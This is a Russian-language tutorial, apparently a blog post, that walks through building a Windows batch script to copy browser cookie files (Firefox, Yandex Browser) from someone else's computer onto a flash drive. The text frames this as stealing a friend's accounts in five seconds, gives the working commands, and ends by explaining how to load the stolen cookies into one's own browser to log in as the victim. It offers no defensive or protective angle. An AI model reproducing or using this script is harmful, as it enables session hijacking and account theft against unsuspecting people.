Предисловие
Представьте себе такую ситуацию: вы сидите в своей комнате с другом и общаетесь, вдруг раздался свист чайника и вы, оставляя друга наедине с компьютером, спешите выключить его и принести пару кружек чая. Как вы думаете, хватит ли такому «другу» 5-ти секунд, чтобы украсть все ваши аккаунты с различных интернет-порталов? В большинстве случаев ответ положительный, ведь компьютер чаще всего используется с правами администратора, и злоумышленнику не составит труда запустить недобрый скрипт.
Теория
Прежде чем создать такой скрипт, нужно уяснить, что такое переменная среды в Windows. Переменная среды – это переменная (ящик с информацией), которая содержит в себе путь к какому-либо каталогу. Вот содержимое переменной %AppData%:
C:\Users\\AppData\Roaming
Несложно догадаться, что такой ход Microsoft сделал для универсальности путей, дабы избежать нужды знать имя пользователя компьютера для составления пути установки программ.
Внутренности скрипта
Алгоритм скрипта очень прост. Он копирует Cookie-файлы всех браузеров в то место, где он находится. Для начала нужно создать текстовый документ и сменить его расширение на “.bat”.
Далее, пропишите в самом начале документа команду “@echo off”. Эта команда предназначена для построчного выполнения всех команд, что будут ниже. Теперь нужно сделать так, чтобы скрипт запомнил, где он находится (для дальнейшего копирования Cookie в это место):
set d=%cd%
Эта строка создаёт переменную d, которая хранит в себе текущий путь.
Теперь нужно совершить переход на диск C, потом – в папку браузера, в которой хранится куки-файл и скопировать его:
chdir /d C:
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy cookies.sqlite %d%\firefox
Косая черта после нашей переменной указывает на то, с каким именем будет находиться куки-файл в папке. Однако не все браузеры расположены в одной переменной среде. К примеру, Yandex Browser находится в %UserProfile%:
cd %UserProfile%\appdata\Local\Yandex\YandexBrowser\User Data\Default
copy Cookies %d%\yandex
Единственная проблема состоит в том, что скрипт не будет работать, если в его пути будут пробелы.
Таким образом, можно скопировать все Cookie-файлы себе на флешку, вставить их в папку с вашим браузером и без проблем зайти от имени жертвы.
